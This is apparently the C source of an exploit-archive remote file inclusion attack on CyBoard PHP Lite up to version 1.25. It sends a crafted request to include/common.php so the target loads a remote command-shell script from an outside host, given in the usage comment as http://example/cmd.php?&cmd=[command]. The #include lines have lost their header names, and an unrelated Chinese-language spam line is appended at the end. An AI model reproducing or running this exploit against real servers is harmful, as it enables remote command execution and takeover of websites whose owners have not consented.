/* CyBoard PHP Lite <= 1.25 (common.php) Remote File Include */ /* Bug found by SpC-x. */ /* */ /* $ gcc -o f_cbl f_cbl-1.25.c */ /* $ ./f_cbl */ /* 192.168.0.1 /[cyboard_path]/ http://example/cmd.php?&cmd=[command] */ /* */ /* Federico Fazzi */ #include #include #include #include #include #include #include #define PORT (80) int main(int argc, char *argv[]) { int sock; char *request; char response[256]; struct sockaddr_in saddr; struct hostent *saddrhost; if ( argc < 3 ) { printf("%s \n", argv[0]); exit(-1); } request = (char *) malloc(1024); // copy into the memory the string GET[..] snprintf(request, 256, "GET %sinclude/common.php?script_path=%s\r\n", argv[2], argv[3]); // init the listener if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("Socket"); exit(-1); } else { // init and set all struct types bzero((char *)&saddr, sizeof(saddr)); saddrhost = gethostbyname(argv[1]); bcopy(saddrhost->h_addr,&saddr.sin_addr,saddrhost->h_length); saddr.sin_family = AF_INET; saddr.sin_port = htons(PORT); // get connection with the webserv if (connect(sock, (struct sockaddr*)&saddr, sizeof(saddr)) == -1) { perror("Socket"); } // send string to the webserv send(sock, request, strlen(request)+1, 0); // get the answer data from webserv while (recv(sock, response, sizeof(response), 0)) { puts(response); } } free(request); close(sock); return 0; }

亚洲欧美在线